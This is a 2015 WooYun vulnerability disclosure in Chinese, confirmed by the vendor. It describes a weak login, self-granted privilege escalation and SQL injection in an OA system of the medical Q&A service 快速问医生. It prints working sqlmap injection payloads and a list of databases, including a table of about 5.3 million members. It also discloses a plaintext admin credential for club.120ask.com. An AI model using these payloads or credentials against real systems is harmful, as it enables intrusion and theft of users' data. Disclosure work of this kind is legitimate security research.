当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0148718

漏洞标题:快速问医生某分站弱口令/sql注入(500W+用户信息泄露)

相关厂商:快速问医生

漏洞作者: Hancock

提交时间:2015-10-23 12:04

修复时间:2015-12-07 16:38

公开时间:2015-12-07 16:38

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-10-23: 细节已通知厂商并且等待厂商处理中
2015-10-23: 厂商已经确认,细节仅向厂商公开
2015-11-02: 细节向核心白帽子及相关领域专家公开
2015-11-12: 细节向普通白帽子公开
2015-11-22: 细节向实习白帽子公开
2015-12-07: 细节向公众公开

简要描述:

数据量好大好大

详细说明:

有问必答oa系统:

http://oa.120.net/login/


输入几个常用帐号 test 123456成功进入

0.jpg


1.jpg


是个低权限的用户

2.jpg


惊现奇葩功能
编辑个人资料可以自己提升权限

3.jpg


4.jpg


捕获sql注射一枚

5.jpg


---
Parameter: number (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: number=ABX-E7CBDE78E44D0CD' AND 2783=2783 AND 'lJux'='lJux
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause
    Payload: number=ABX-E7CBDE78E44D0CD' AND (SELECT 3344 FROM(SELECT COUNT(*),C
ONCAT(0x7171766a71,(SELECT (ELT(3344=3344,1))),0x7171767171,FLOOR(RAND(0)*2))x F
ROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'wpIM'='wpIM
    Type: stacked queries
    Title: MySQL > 5.0.11 stacked queries (SELECT - comment)
    Payload: number=ABX-E7CBDE78E44D0CD';(SELECT * FROM (SELECT(SLEEP(5)))PFTk)#
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: number=ABX-E7CBDE78E44D0CD' AND (SELECT * FROM (SELECT(SLEEP(5)))FG
Cg) AND 'ftPw'='ftPw
    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: number=ABX-E7CBDE78E44D0CD' UNION ALL SELECT NULL,CONCAT(0x7171766a
71,0x69476468556450525247,0x7171767171),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,
NULL,NULL#
---


管理员权限

6.jpg


悲剧发现可读不可写
写不了shell读下数据吧

available databases [24]:
[*] admin
[*] ask_log
[*] back
[*] book
[*] club
[*] clubdx
[*] db_jingxi
[*] dede
[*] devdoc
[*] donotthis
[*] information_schema
[*] JKY_OA
[*] mysql
[*] performance_schema
[*] post
[*] sg
[*] stat_log
[*] test
[*] tids
[*] yb
[*] yb2
[*] yibao
[*] yiyue
[*] zheli


涉及24个库
例:
1.
Database: clubdx
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| pre_common_member | 5309281 |
+-------------------+---------+
2.
club库 534W数据
应该是

club.120ask.com

这个站的

7.jpg


令之前测试发现这个站club.120ask.com管理员帐号弱口令
苦于后台ip限制就么有提交现送出

id=1管理员帐号密码都是clubdxadmin


8.jpg


漏洞证明:

9.jpg


10.jpg

修复方案:

:)

版权声明:转载请注明来源 Hancock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-10-23 16:36

厂商回复:

存在此问题,感谢!

最新状态:

暂无